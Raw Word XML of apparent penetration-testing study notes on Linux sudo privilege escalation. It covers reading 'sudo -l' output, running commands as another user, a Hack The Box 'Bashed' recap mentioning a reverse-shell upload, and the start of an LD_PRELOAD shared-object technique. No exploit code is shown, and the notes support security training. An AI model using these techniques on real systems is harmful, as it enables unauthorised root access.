          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000228D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1179"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run this as the current user to see what sudo privileges you have.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000228E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1179"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One example output is below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000228F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">james@knife:/usr/share$ sudo -l </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002290">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002291">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Matching Defaults entries for james on knife: env_reset, mail_badpass, </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002292">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002293">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002294">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002295">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User james may run the following commands on knife: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002296">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(root) NOPASSWD: /usr/bin/knife</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002297">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002298">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As you can see from here, we are allowed to run /usr/bin/knife as root, without any passwords. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002299">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Below are the default entries but they are not very useful!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000229A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">env_reset: Resets environment variables to a safe default when using sudo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000229B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mail_badpass: Sends an email to the administrator when a user enters an incorrect password for sudo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000229C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">secure_path: Specifies the PATH environment variable used by sudo to locate executables.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000229D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000229E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000229F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes you are allowed to run SUDO commands as another user:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5081588" cy="1245966"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="458" name="image443.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image443.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId738"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5081588" cy="1245966"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1184"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, we are user ariana and we can run this command as Selena using Sudo. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1184"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the section below, we learn how to do this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are allowed to run any SUDO commands from another user, here's how to do that:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u &lt;username&gt; &lt;command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is what we did in the Bashed HTB. When we did sudo -l, we saw:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User www-data may run the following commands on bashed:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(scriptmanager : scriptmanager) NOPASSWD: ALL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means that scriptmanager was the user so we ran:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u scriptmanager &lt;command&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="286"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The ideal command to run here is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -i</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which gets interactive bash shell as root, but here, shells are not persistent. So, we had to upload a reverse shell to the web server, trigger the reverse shell by accessing the uploads URL, and then get a connection. From there, we could get the user flag, so it had nothing to do with the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo -u scriptmanager </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stuff. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022AD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ddl2mzjyo2ve" w:id="306"/>
      <w:bookmarkEnd w:id="306"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD (environment variable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from Tib3rius Sudo Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1000125"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="464" name="image333.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image333.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId739"/>
                    <a:srcRect b="71074" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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22B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="893"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You see this stuff at the top of sudo -l that you always ignore? Well, it has a meaning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment Variables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="934"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Programs run through sudo can inherit the environment variables from the user’s environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="934"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the /etc/sudoers config file, if the env_reset option is set, sudo will run programs in a new, minimal environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="934"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The env_keep option can be used to keep certain environment variables from the user’s environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="934"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The configured options are displayed when running sudo -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022BA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_Preload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD is an environment variable which can be set to the path of a shared object (.so) file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When set, the shared object will be loaded before any others.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By creating a custom shared object and creating an init() function, we can execute code as soon as the object is loaded</w:t>
      </w:r>
    </w:p>
